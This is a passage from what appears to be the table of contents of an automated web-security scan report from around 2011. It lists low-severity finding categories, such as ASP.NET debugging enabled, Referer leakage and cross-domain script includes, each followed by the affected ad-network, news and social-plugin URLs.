18.3. http://www.trizetto.com/favicon.ico

18.4. http://www.trizetto.com/newMenu/arrow-down.gif

18.5. http://www25.glam.com/files/gadget-store/installs/84371626942385/flvpath_2-73131245.flv

19. ASP.NET debugging enabled

19.1. http://4qinvite.4q.iperceptions.com/Default.aspx

19.2. http://clk.pointroll.com/Default.aspx

19.3. http://www.patlive.com/Default.aspx

20. Referer-dependent response

20.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

20.2. http://480-adver-view.c3metrics.com/v.js

20.3. http://ads.adbrite.com/adserver/behavioral-data/8201

20.4. http://ads.adbrite.com/adserver/behavioral-data/8204

20.5. http://ads.adbrite.com/adserver/vdi/712156

20.6. http://ads.adbrite.com/adserver/vdi/779045

20.7. http://ads.sixapart.com/custom

20.8. http://adserving.cpxinteractive.com/st

20.9. http://api.twitter.com/1/statuses/user_timeline.json

20.10. http://arts.onbloglist.com/img12.php

20.11. http://c.brightcove.com/services/viewer/federated_f9

20.12. http://idexperts.wufoo.com/embed/z7x4a3/def/embedKey=z7x4a3578302&referrer=

20.13. http://map.media6degrees.com/orbserv/aopix

20.14. http://twitter.com/statuses/user_timeline/fashionablegal.json

20.15. http://www.facebook.com/plugins/activity.php

20.16. http://www.facebook.com/plugins/like.php

20.17. http://www.facebook.com/plugins/recommendations.php

20.18. http://www.thefashionablegal.com/04/2011/interview-with-rob-zangardi-and-mariel-haenn/

20.19. http://www.thefashionablegal.com/04/2011/interview-with-rob-zangardi-and-mariel-haenn/index.php

20.20. http://www.thefashionablegal.com/04/2011/spring-fashion-trends/

20.21. http://www.thefashionablegal.com/04/2011/spring-fashion-trends/index.php

20.22. http://www.youtube.com/apiplayer

21. Cross-domain POST

21.1. http://ecrm.logrhythm.com/PHIPAAReymannPaperandPetersenDemoDownload.html

21.2. http://www.inspiredelearning.com/privacy/hipaa.pricing.htm

21.3. http://www.inspiredelearning.com/privacy/hipaa.pricing.htm

21.4. http://www.inspiredelearning.com/privacy/hipaa.pricing.htm

21.5. http://www.inspiredelearning.com/privacy/hipaa.pricing.htm

21.6. http://www.inspiredelearning.com/privacy/hipaa.pricing.htm

21.7. http://www.inspiredelearning.com/privacy/hipaa.pricing.htm

21.8. http://www.inspiredelearning.com/privacy/hipaa.pricing.htm

21.9. http://www.servicemax.com/landing/adwords/aberdeen-scheduling.html

22. Cross-domain Referer leakage

22.1. http://0.r.REDACTED.com/

22.2. http://0.r.REDACTED.com/

22.3. http://0.r.REDACTED.com/

22.4. http://0.r.REDACTED.com/

22.5. http://1077745.r.REDACTED.com/

22.6. http://595221.r.REDACTED.com/

22.7. http://656900.r.REDACTED.com/

22.8. http://954370.r.REDACTED.com/

22.9. http://a.rad.REDACTED.com/ADSAdClient31.dll

22.10. http://a.rad.REDACTED.com/ADSAdClient31.dll

22.11. http://ad-apac.doubleclick.net/adj/onl.bt.news/opinion/politics

22.12. http://ad.amgdgt.com/ads/

22.13. http://ad.amgdgt.com/ads/

22.14. http://ad.amgdgt.com/ads/

22.15. http://ad.au.doubleclick.net/adj/ndm.dtm/news/breakingnews/national

22.16. http://ad.au.doubleclick.net/adj/ndm.dtm/news/breakingnews/national

22.17. http://ad.au.doubleclick.net/adj/ndm.news/news/breakingnews/national

22.18. http://ad.au.doubleclick.net/adj/ndm.news/news/breakingnews/national

22.19. http://ad.au.doubleclick.net/adj/ndm.taus/news

22.20. http://ad.au.doubleclick.net/adj/ndm.taus/news

22.21. http://ad.au.doubleclick.net/adj/ndm.taus/news/nation

22.22. http://ad.au.doubleclick.net/adj/ndm.taus/news/nation

22.23. http://ad.au.doubleclick.net/adj/ndm.tst/news

22.24. http://ad.au.doubleclick.net/adj/ndm.tst/news

22.25. http://ad.au.doubleclick.net/adj/ndm.tst/news/state

22.26. http://ad.au.doubleclick.net/adj/ndm.tst/news/state

22.27. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.390

22.28. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.684

22.29. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.687

22.30. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.689

22.31. http://ad.doubleclick.net/adi/N5047.Turn/B5053148.22

22.32. http://ad.doubleclick.net/adi/N5956.Turn/B3941858.17

22.33. http://ad.doubleclick.net/adj/N1243.Glam.com/B5234896.7

22.34. http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.3

22.35. http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.5

22.36. http://ad.doubleclick.net/adj/N4674.149112.GLAMMEDIANETWORK/B5435962.2

22.37. http://ad.doubleclick.net/adj/N4674.149112.GLAMMEDIANETWORK/B5435962.215

22.38. http://ad.doubleclick.net/adj/N5390.6393.9658750318521/B5269344.8

22.39. http://ad.doubleclick.net/adj/kmx.righthealth/results

22.40. http://ad.doubleclick.net/adj/mcn.skynews.com.au/topstories

22.41. http://ad.doubleclick.net/adj/mcn.skynews.com.au/topstories

22.42. http://ad.doubleclick.net/adj/mi.hhd00/News/National

22.43. http://ad.turn.com/server/ads.js

22.44. http://ad.turn.com/server/ads.js

22.45. http://ad.yieldmanager.com/iframe3

22.46. http://ad.yieldmanager.com/iframe3

22.47. http://ad.yieldmanager.com/iframe3

22.48. http://ad.yieldmanager.com/pixel

22.49. http://adadvisor.net/adscores/g.js

22.50. http://adadvisor.net/adscores/g.js

22.51. http://ads-vrx.adbrite.com/adserver/display_iab_ads

22.52. http://ads-vrx.adbrite.com/adserver/display_iab_ads

22.53. http://ads-vrx.adbrite.com/adserver/display_iab_ads

22.54. http://ads-vrx.adbrite.com/adserver/display_iab_ads

22.55. http://ads-vrx.adbrite.com/adserver/display_iab_ads

22.56. http://ads-vrx.adbrite.com/adserver/display_iab_ads

22.57. http://ads-vrx.adbrite.com/adserver/display_iab_ads

22.58. http://ads-vrx.adbrite.com/adserver/display_iab_ads

22.59. http://ads-vrx.adbrite.com/adserver/display_iab_ads

22.60. http://ads-vrx.adbrite.com/adserver/display_iab_ads

22.61. http://ads.pointroll.com/PortalServe/

22.62. http://ads.pointroll.com/PortalServe/

22.63. http://ads.pointroll.com/PortalServe/

22.64. http://ads.pointroll.com/PortalServe/

22.65. http://ads.pointroll.com/PortalServe/

22.66. http://ads.pointroll.com/PortalServe/

22.67. http://ads.pointroll.com/PortalServe/

22.68. http://ads.pointroll.com/PortalServe/

22.69. http://ads.pointroll.com/PortalServe/

22.70. http://ads.revsci.net/adserver/ako

22.71. http://ads.revsci.net/adserver/ako

22.72. http://ads.revsci.net/adserver/ako

22.73. http://ads.revsci.net/adserver/ako

22.74. http://ads.revsci.net/adserver/ako

22.75. http://ads.shopstyle.com/

22.76. http://ads.sixapart.com/custom

22.77. http://ads.sixapart.com/custom

22.78. http://ads.specificmedia.com/serve/v=5

22.79. http://ads.specificmedia.com/serve/v=5

22.80. http://altfarm.mediaplex.com/ad/js/13001-83639-12284-11

22.81. http://altfarm.mediaplex.com/ad/js/13966-95815-19269-5

22.82. https://auth.tek.com/mytek/faces/loginregistration.jsp

22.83. http://beauty.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php

22.84. http://bidder.mathtag.com/iframe/notify

22.85. http://bidder.mathtag.com/iframe/notify

22.86. http://bidder.mathtag.com/iframe/notify

22.87. http://celebrities.glam.com/topic/

22.88. http://celebrities.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php

22.89. http://choices.truste.com/ca

22.90. http://clickserve.cc-dt.com/link/tplimage

22.91. http://clk.pointroll.com/bc/

22.92. http://cm.g.doubleclick.net/pixel

22.93. http://REDACTED/js_1_0/

22.94. http://delb.opt.fimserve.com/adopt/

22.95. http://demr.opt.fimserve.com/adopt/

22.96. http://desb.opt.fimserve.com/adopt/

22.97. http://designers.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php

22.98. http://e-sites2.tek.com/mytek/faces/resourcelogin.jsp

22.99. http://ecrm.logrhythm.com/PHIPAAReymannPaperandPetersenDemoDownload.html

22.100. http://engine.cmmeglobal.com/v1/request

22.101. http://entertainment.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php

22.102. http://fls.doubleclick.net/activityi

22.103. http://gan.doubleclick.net/gan_impression

22.104. http://gan.doubleclick.net/gan_impression

22.105. http://googleads.g.doubleclick.net/pagead/ads

22.106. http://googleads.g.doubleclick.net/pagead/ads

22.107. http://googleads.g.doubleclick.net/pagead/ads

22.108. http://googleads.g.doubleclick.net/pagead/ads

22.109. http://googleads.g.doubleclick.net/pagead/ads

22.110. http://googleads.g.doubleclick.net/pagead/ads

22.111. http://googleads.g.doubleclick.net/pagead/ads

22.112. http://googleads.g.doubleclick.net/pagead/ads

22.113. http://googleads.g.doubleclick.net/pagead/ads

22.114. http://googleads.g.doubleclick.net/pagead/ads

22.115. http://googleads.g.doubleclick.net/pagead/ads

22.116. http://googleads.g.doubleclick.net/pagead/ads

22.117. http://ib.adnxs.com/ab

22.118. http://ib.adnxs.com/acb

22.119. http://ib.adnxs.com/acb

22.120. http://ib.adnxs.com/acb

22.121. http://ib.adnxs.com/if

22.122. http://ib.adnxs.com/ptj

22.123. http://ib.adnxs.com/ptj

22.124. http://ib.adnxs.com/ptj

22.125. http://img.mediaplex.com/content/0/17975/Homepage_300x250_NN.js

22.126. http://img.mediaplex.com/content/0/17975/Homepage_300x250_NN.js

22.127. http://img.mediaplex.com/content/0/17975/Homepage_728x90_Levemir.js

22.128. http://img.mediaplex.com/content/0/17975/Homepage_728x90_Levemir.js

22.129. http://img.mediaplex.com/content/0/17975/Homepage_728x90_Levemir.js

22.130. http://img.mediaplex.com/content/0/17975/SaveToday_300x250_NN.js

22.131. http://img.mediaplex.com/content/0/17975/SaveToday_728x90_Levemir.js

22.132. http://img.mediaplex.com/content/0/17975/SaveToday_728x90_Levemir.js

22.133. http://leader.linkexchange.com/3/X889499/showlogo

22.134. http://leader.linkexchange.com/6/X889499/showlogo

22.135. http://living.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php

22.136. http://loadus.exelator.com/load/

22.137. http://loadus.exelator.com/load/

22.138. http://loadus.exelator.com/load/

22.139. http://loadus.exelator.com/load/

22.140. http://loadus.exelator.com/load/net.php

22.141. http://maps.google.com/maps

22.142. http://media.adfrontiers.com/pq

22.143. http://media.fastclick.net/w/get.media

22.144. http://mf.sitescout.com/disp

22.145. http://news.9REDACTED.com.au/js/bld/lcm.js

22.146. http://news.REDACTED/national/8241327/migration-proposal-weak-abbott-says

22.147. http://oas.guardian.co.uk/RealMedia/ads/adstream_mjx.ads/www.guardian.co.uk/music/2011/may/01/ray-davies-kinks-meltdown-interview/oas.html/1203925231@Top,Middle2,Right1,x31

22.148. http://optimized-by.rubiconproject.com/a/7845/12566/22544-2.html

22.149. http://optimized-by.rubiconproject.com/a/7845/12566/22544-9.html

22.150. http://optimized-by.rubiconproject.com/a/7845/12566/26835-15.html

22.151. http://pixel.invitemedia.com/rubicon_sync

22.152. http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com/gadgets/ifr

22.153. http://rad.REDACTED.com/ADSAdClient31.dll

22.154. http://rad.REDACTED.com/ADSAdClient31.dll

22.155. http://rad.REDACTED.com/ADSAdClient31.dll

22.156. http://rad.REDACTED.com/ADSAdClient31.dll

22.157. http://rd.apmebf.com/w/get.media

22.158. http://resources.news.com.au/cs/library/modules/jquery-socialise/plugins/linkedin/iframe.html

22.159. http://www.abc.net.au/res/libraries/cinerama2/scripts/cinerama2_functions.js

22.160. http://www.bing.com/news/search

22.161. http://www.bing.com/search

22.162. http://www.bing.com/search

22.163. http://www.bing.com/social/s/icon_rt.gif

22.164. http://www.bing.com/social/socialwidget/fuse-montage-twitter-widget-v1.htm

22.165. http://www.businessspectator.com.au/bs.nsf/Article/Labor-NBN-carbon-tax-broadband-Julia-Gillard-Tony--pd20110502-GFSXJ

22.166. http://www.businessspectator.com.au/bs.nsf/Article/Labor-NBN-carbon-tax-broadband-Julia-Gillard-Tony--pd20110502-GFSXJ

22.167. http://www.businessspectator.com.au/bs.nsf/Article/Labor-NBN-carbon-tax-broadband-Julia-Gillard-Tony--pd20110502-GFSXJ

22.168. http://www.businessspectator.com.au/bs.nsf/fmJobListings

22.169. http://www.businessspectator.com.au/bs.nsf/fmJobListings

22.170. http://www.businessspectator.com.au/bs.nsf/fmJobListings

22.171. http://www.connect.facebook.com/widgets/fan.php

22.172. http://www.connect.facebook.com/widgets/fan.php

22.173. http://www.dailytelegraph.com.au/news/breaking-news/tony-abbott-says-migration-proposals-are-weak/story-e6freuz0-1226045133021

22.174. http://www.facebook.com/plugins/activity.php

22.175. http://www.facebook.com/plugins/facepile.php

22.176. http://www.facebook.com/plugins/like.php

22.177. http://www.facebook.com/plugins/likebox.php

22.178. http://www.facebook.com/plugins/likebox.php

22.179. http://www.facebook.com/plugins/likebox.php

22.180. http://www.facebook.com/plugins/likebox.php

22.181. http://www.facebook.com/plugins/likebox.php

22.182. http://www.facebook.com/plugins/likebox.php

22.183. http://www.facebook.com/plugins/likebox.php

22.184. http://www.facebook.com/plugins/recommendations.php

22.185. http://www.facebook.com/plugins/recommendations.php

22.186. http://www.flickr.com/badge_code_v2.gne

22.187. http://www.glam.com/

22.188. http://www.glam.com/app/site/loadServicePage.act

22.189. http://www.glam.com/topic/

22.190. http://www.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php

22.191. http://www.google.com/search

22.192. http://www.google.com/search

22.193. http://www.hipaastore.com/index.php

22.194. http://www.inspiredelearning.com/inspired/request.info.htm

22.195. http://www.inspiredelearning.com/privacy/hipaa.pricing.htm

22.196. http://www.righthealth.com/javascripts/cache/topic_bottom-righthealth-sem-chimborazo-151793.js

22.197. http://www.righthealth.com/stylesheets/cache/topic-s_righthealth-sem-chimborazo-151793.css

22.198. http://www.righthealth.com/topic/What_Is_Hipaa

22.199. http://www.skynews.com.au/topstories/article.aspx

22.200. http://www.strausnews.com/shared-content/myweather/weather.php

22.201. http://www.strausnews.com/shared-content/myweather/weather.php

22.202. http://www.strausnews.com/shared-content/myweather/weather.php

22.203. http://www.strausnews.com/shared-content/myweather/weather.php

22.204. http://www.strausnews.com/shared-content/myweather/weather.php

22.205. http://www.thefashionablegal.com/04/2011/interview-with-rob-zangardi-and-mariel-haenn/

22.206. http://www.thefashionablegal.com/04/2011/spring-fashion-trends/

22.207. http://www.thefashionablegal.com/wp-content/themes/lifestyle_40/leaderboard.php

22.208. http://www.thefashionablegal.com/wp-content/themes/lifestyle_40/leaderboard.php

22.209. http://www.thefashionablegal.com/wp-content/themes/lifestyle_40/leaderboard.php

22.210. http://www.thefashionablegal.com/wp-content/themes/lifestyle_40/leaderboard.php

22.211. http://www.thefashionablegal.com/wp-content/themes/lifestyle_40/leaderboard.php

22.212. http://www.thefashionablegal.com/wp-content/themes/lifestyle_40/leaderboard.php

22.213. http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html

22.214. http://www2.glam.com/app/site/affiliate/viewChannelModule.act

22.215. http://www2.glam.com/app/site/affiliate/viewChannelModule.act

22.216. http://www2.glam.com/app/site/affiliate/viewChannelModule.act

22.217. http://www2.glam.com/app/site/affiliate/viewChannelModule.act

23. Cross-domain script include

23.1. http://ad.amgdgt.com/ads/

23.2. http://ad.amgdgt.com/ads/

23.3. http://ad.amgdgt.com/ads/

23.4. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.390

23.5. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.684

23.6. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.687

23.7. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.689

23.8. http://ad.doubleclick.net/adi/N5047.Turn/B5053148.22

23.9. http://ad.doubleclick.net/adi/N5956.Turn/B3941858.17

23.10. http://ad.turn.com/server/ads.js

23.11. http://ad.turn.com/server/ads.js

23.12. http://ad.yieldmanager.com/iframe3

23.13. http://adadvisor.net/adscores/g.js

23.14. http://adadvisor.net/adscores/g.js

23.15. http://ads.revsci.net/adserver/ako

23.16. http://ads.revsci.net/adserver/ako

23.17. http://ads.revsci.net/adserver/ako

23.18. http://ads.revsci.net/adserver/ako

23.19. http://ads.revsci.net/adserver/ako

23.20. http://ads.shopstyle.com/

23.21. http://ads.sixapart.com/custom

23.22. http://ads.sixapart.com/custom

23.23. http://altfarm.mediaplex.com/ad/js/13966-95815-19269-5

23.24. http://au.myspace.com/

23.25. https://auth.tek.com/mytek/faces/forgotpassword.jsp

23.26. https://auth.tek.com/mytek/faces/loginregistration.jsp

23.27. http://beauty.glam.com/

23.28. http://beauty.glam.com/2011/04/11/get-the-look-nicole-ari-parker-is-pretty-as-a-peach/

23.29. http://beauty.glam.com/2011/04/11/get-the-look-nicole-ari-parker-is-pretty-as-a-peach/wp-content/themes/glam_v1/static/images/ad_icon_small.png

23.30. http://bidder.mathtag.com/iframe/notify

23.31. http://c5.zedo.com//ads3/k/305/934163/4381/1000003/i.js

23.32. http://celebrities.glam.com/

23.33. http://celebrities.glam.com/topic/

23.34. http://demr.opt.fimserve.com/adopt/

23.35. http://designers.glam.com/2011/04/29/royal-wedding-style-what-the-guests-wore/

23.36. http://designers.glam.com/2011/04/29/royal-wedding-style-what-the-guests-wore/wp-content/themes/glam_v1/static/images/ad_icon_small.png

23.37. http://designers.glam.com/forgotpassword

23.38. http://e-sites2.tek.com/mytek/faces/resourcelogin.jsp

23.39. http://ecrm.logrhythm.com/PHIPAAReymannPaperandPetersenDemoDownload.html

23.40. http://entertainment.glam.com/

23.41. http://entertainment.glam.com/

23.42. http://entertainment.glam.com/2011/04/06/meet-the-cast-of-braxton-family-values/

23.43. http://fls.doubleclick.net/activityi

23.44. http://glam.ivwbox.de/2004/01/survey.js

23.45. http://googleads.g.doubleclick.net/pagead/ads

23.46. http://googleads.g.doubleclick.net/pagead/ads

23.47. http://ib.adnxs.com/acb

23.48. http://ib.adnxs.com/if

23.49. http://ib.adnxs.com/ptj

23.50. http://living.glam.com/

23.51. http://living.glam.com/

23.52. http://loadus.exelator.com/load/

23.53. http://lp.idexpertscorp.com/hitech-whitepapera/

23.54. http://media.adfrontiers.com/pq

23.55. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnewsau/ros/728x90/jx/ss/a/1623201161@Top1

23.56. http://news.REDACTED/national/8241327/migration-proposal-weak-abbott-says

23.57. http://news.xinhuanet.com/english2010/world/2011-05/02/c_13855230.htm

23.58. http://r1-ads.ace.advertising.com/site=743833/size=300250/u=2/bnum=65003685/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.thesunchronicle.com%252Farticles%252F2011%252F05%252F02%252Frehoboth%252F9166782.txt

23.59. http://r1-ads.ace.advertising.com/site=781800/size=728090/u=2/bnum=78594486/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.islandpacket.com%252F2011%252F05%252F02%252F1640363%252Fwill-killing-osama-kill-the-movement.html

23.60. http://r1-ads.ace.advertising.com/site=795866/size=728090/u=2/bnum=47065580/hr=15/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.righthealth.com%252Ftopic%252FWhat_Is_Hipaa%253Fp%253Dl%2526as%253DREDACTED%2526ac%253D529%2526kgl%253D38620759

23.61. http://r1-ads.ace.advertising.com/site=799695/size=300250/u=2/bnum=54085448/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.theage.com.au%252Fnational%252Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html

23.62. http://r1-ads.ace.advertising.com/site=801645/size=728090/u=2/bnum=28266332/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.dailytelegraph.com.au%252Fnews%252Fbreaking-news%252Ftony-abbott-says-migration-proposals-are-weak%252Fstory-e6freuz0-1226045133021%253Ffrom%253Dpublic_rss

23.63. http://r1-ads.ace.advertising.com/site=801645/size=728090/u=2/bnum=29579703/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.theaustralian.com.au%252Fnews%252Fnation%252Fabbott-a-hero-on-troubled-christmas-island%252Fstory-e6frg6nf-1226045245809

23.64. http://r1-ads.ace.advertising.com/site=801647/size=300250/u=2/bnum=65424947/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.news.com.au%252Fbreaking-news%252Fnational%252Fchristmas-island-detainee-sews-lips-together%252Fstory-e6frfku9-1226044502823

23.65. http://resources.brisbanetimes.com.au/common/media-common-1.0/js/fdjsf/output/fd.registrars_min.js

23.66. http://resources.news.com.au/cs/library/modules/jquery-socialise/plugins/linkedin/iframe.html

23.67. http://resources.smh.com.au/common/media-common-1.0/js/fdjsf/output/fd.registrars_min.js

23.68. http://resources.theage.com.au/common/media-common-1.0/js/fdjsf/output/fd.registrars_min.js

23.69. http://resources.watoday.com.au/common/media-common-1.0/js/fdjsf/output/fd.registrars_min.js

23.70. http://vpswebserver.com/

23.71. http://www.afewgoodygumdrops.com/2011/04/few-goody-gumdrops-reviews-christian.html

23.72. http://www.bing.com/social/socialwidget/fuse-montage-twitter-widget-v1.htm

23.73. http://www.brisbanetimes.com.au/opinion/politics/blogs/gengreens/temporary-protection-visas-are-not-the-answer-20110427-1dwe3.html

23.74. http://www.businessspectator.com.au/bs.nsf/Article/Labor-NBN-carbon-tax-broadband-Julia-Gillard-Tony--pd20110502-GFSXJ

23.75. http://www.businessspectator.com.au/bs.nsf/Article/Labor-NBN-carbon-tax-broadband-Julia-Gillard-Tony--pd20110502-GFSXJ

23.76. http://www.businessspectator.com.au/bs.nsf/Article/Labor-NBN-carbon-tax-broadband-Julia-Gillard-Tony--pd20110502-GFSXJ

23.77. http://www.connect.facebook.com/widgets/fan.php

23.78. http://www.dailytelegraph.com.au/news/breaking-news/tony-abbott-says-migration-proposals-are-weak/story-e6freuz0-1226045133021

23.79. http://www.facebook.com/plugins/activity.php

23.80. http://www.facebook.com/plugins/facepile.php

23.81. http://www.facebook.com/plugins/like.php

23.82. http://www.facebook.com/plugins/likebox.php

23.83. http://www.facebook.com/plugins/recommendations.php

23.84. http://www.glam.com/

23.85. http://www.glam.com/

23.86. http://www.glam.com/

23.87. http://www.glam.com/

23.88. http://www.glam.com/

23.89. http://www.glam.com/

23.90. http://www.glam.com/2011/04/11/sip-in-the-scene-at-the-glamourous-paramount-bar/

23.91. http://www.glam.com/app/site/loadServicePage.act

23.92. http://www.glam.com/app/site/loadServicePage.act

23.93. http://www.glam.com/category/uncategorized/

23.94. http://www.glam.com/forgotpassword

23.95. http://www.glam.com/forgotpassword

23.96. http://www.glam.com/go-natural/

23.97. http://www.glam.com/profile

23.98. http://www.glam.com/style/

23.99. http://www.glam.com/topic/

23.100. http://www.glam.com/topic/

23.101. http://www.glam.com/videos/

23.102. http://www.glam.com/wp-content/plugins/disqus-comment-system/xd_receiver.htm

23.103. http://www.glam.de/

23.104. http://www.glam.jp/

23.105. http://www.glammedia.com/

23.106. http://www.glammedia.com/about_glam/legal/copyright_policy.php

23.107. http://www.glammedia.com/about_glam/legal/optout.php

23.108. http://www.glammedia.com/about_glam/legal/privacy.php

23.109. http://www.glammedia.com/about_glam/legal/privacyandsecuritypolicy-previousversion9-12-2007.php

23.110. http://www.glammedia.com/about_glam/legal/terms_of_use.php

23.111. http://www.glammedia.com/about_glam/news/2009/03/31/glam-media-launches-tinkercom%E2%80%94the-first-twitter-facebook-micro-blogging-service-for-real-time-conversations-on-events-and-breaking-news

23.112. http://www.glammedia.com/about_glam/news/2009/03/31/glam-media-launches-tinkercomÔ??the-first-twitter-facebook-micro-blogging-service-for-real-time-conversations-on-events-and-breaking-news

23.113. http://www.glammedia.com/about_glam/news/2009/03/legal/privacy.php

23.114. http://www.glammedia.com/about_glam/news/2009/03/our_properties/tinker.php

23.115. http://www.glammedia.com/about_glam/news/in_the_news.php

23.116. http://www.glammedia.com/about_glam/news/press_room.php

23.117. http://www.glammedia.com/about_glam/our_people/management.php

23.118. http://www.glammedia.com/about_glam/our_properties/bliss.php

23.119. http://www.glammedia.com/about_glam/our_properties/brash.php

23.120. http://www.glammedia.com/about_glam/our_properties/glam_owned_and_operated_sites.php

23.121. http://www.glammedia.com/about_glam/our_properties/glamsocial.php

23.122. http://www.glammedia.com/about_glam/our_properties/glamtv.php

23.123. http://www.glammedia.com/about_glam/our_properties/subscribe_rss.php

23.124. http://www.glammedia.com/about_glam/our_properties/tinker.php

23.125. http://www.glammedia.com/about_glam/our_story/index.php

23.126. http://www.glammedia.com/about_glam/our_story/our_story.php

23.127. http://www.glammedia.com/advertisers/

23.128. http://www.glammedia.com/advertisers/adaptive.php

23.129. http://www.glammedia.com/advertisers/audience.php

23.130. http://www.glammedia.com/advertisers/capabilities.php

23.131. http://www.glammedia.com/advertisers/certifications/index.php

23.132. http://www.glammedia.com/advertisers/clients/index.php

23.133. http://www.glammedia.com/advertisers/index.php

23.134. http://www.glammedia.com/advertisers/ourwork/index.php

23.135. http://www.glammedia.com/advertisers/specifications/index.php

23.136. http://www.glammedia.com/advertisers/submit_rfp.php

23.137. http://www.glammedia.com/advertisers/targeting.php

23.138. http://www.glammedia.com/contact_us/

23.139. http://www.glammedia.com/contact_us/contact_us.php

23.140. http://www.glammedia.com/contact_us/index.php

23.141. http://www.glammedia.com/contact_us/jobs/index.php

23.142. http://www.glammedia.com/contact_us/location/index.php

23.143. http://www.glammedia.com/index.php

23.144. http://www.glammedia.com/international/

23.145. http://www.glammedia.com/partners/index.php

23.146. http://www.glammedia.com/partners/rss.php

23.147. http://www.glammedia.com/publishers/glam_publisher_network/

23.148. http://www.glammedia.com/publishers/glam_publisher_network/apply_now.php

23.149. http://www.glammedia.com/publishers/glam_publisher_network/directory_of_glam_sites.php

23.150. http://www.glammedia.com/publishers/glam_publisher_network/index.php

23.151. http://www.glammedia.com/publishers/glam_publisher_network/site_requirements.php

23.152. http://www.glammedia.com/publishers/glam_publisher_network/why_join_the_network.php

23.153. http://www.guardian.co.uk/music/2011/may/01/ray-davies-kinks-meltdown-interview

23.154. http://www.hipaa-101.com/

23.155. http://www.hostessblog.com/2011/04/royal-wedding-theme-printables-part-2/

23.156. https://www.idexpertscorp.com/membership/

23.157. http://www.infocrossing.com/

23.158. http://www.inspiredelearning.com/inspired/request.info.htm

23.159. http://www.inspiredelearning.com/privacy/hipaa.pricing.htm

23.160. http://www.inspiredelearning.com/privacy/hipaa.privacy.security.htm

23.161. http://www.islandpacket.com/2011/05/02/1640363/will-killing-osama-kill-the-movement.html

23.162. http://www.logrhythm.com/

23.163. http://www.myspace.com/serverSideIframeModifier.html

23.164. http://www.news.com.au/breaking-news/national/christmas-island-detainee-sews-lips-together/story-e6frfku9-1226044502823

23.165. http://www.nexica.com/error404.aspx

23.166. http://www.orbitcast.com/

23.167. http://www.orbitcast.com/archives.html

23.168. http://www.orbitcast.com/contact/

23.169. http://www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.REDACTED.com|REDACTED.com/wonderwall|v14.REDACTED.com/|preview.REDACTED.com/|www.REDACTED.com/preview.aspx|mtv.com/videos/|mtv.com/

23.170. http://www.patlive.com/appointment-scheduling/

23.171. http://www.perthnow.com.au/news/fresh-rooftop-protest-by-asylum-seekers-despite-crackdown/story-e6frg12c-1226045349903

23.172. http://www.perthnow.com.au/news/western-australia/christmas-island-kill-accused-lashed-out-with-knife/story-e6frg13u-1226046333217

23.173. http://www.perthnow.com.au/news/western-australia/two-asylum-seekers-attempt-suicide-at-airport-detention-centre/story-e6frg13u-1226040848142

23.174. http://www.playtexbramakeover.com/

23.175. http://www.righthealth.com/topic/What_Is_Hipaa

23.176. http://www.saksfifthavenue.com/main/ProductDetail.jsp

23.177. http://www.servicemax.com/landing/adwords/aberdeen-scheduling.html

23.178. http://www.sfaxme.com/index.php

23.179. http://www.shadowtrack.com/index.php

23.180. http://www.shopstyle.com/browse

23.181. http://www.skynews.com.au/businessnews/article.aspx

23.182. http://www.skynews.com.au/finance/article.aspx

23.183. http://www.skynews.com.au/national/article.aspx

23.184. http://www.skynews.com.au/showbiz/article.aspx

23.185. http://www.skynews.com.au/sport/article.aspx

23.186. http://www.skynews.com.au/tech/article.aspx

23.187. http://www.skynews.com.au/topstories/article.aspx

23.188. http://www.smh.com.au/action/printArticle

23.189. http://www.smh.com.au/national/roof-sitin-at-christmas-island-20110426-1dv4v.html

23.190. http://www.strausnews.com/

23.191. http://www.strausnews.com/articles/2011/05/02/warwick_advertiser/news/25.txt

23.192. http://www.stumbleupon.com/submit

23.193. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.REDACTED.com|REDACTED.com/wonderwall|v14.REDACTED.com/|preview.REDACTED.com/|www.REDACTED.com/preview.aspx|mtv.com/videos/|mtv.com/

23.194. http://www.tek.com/

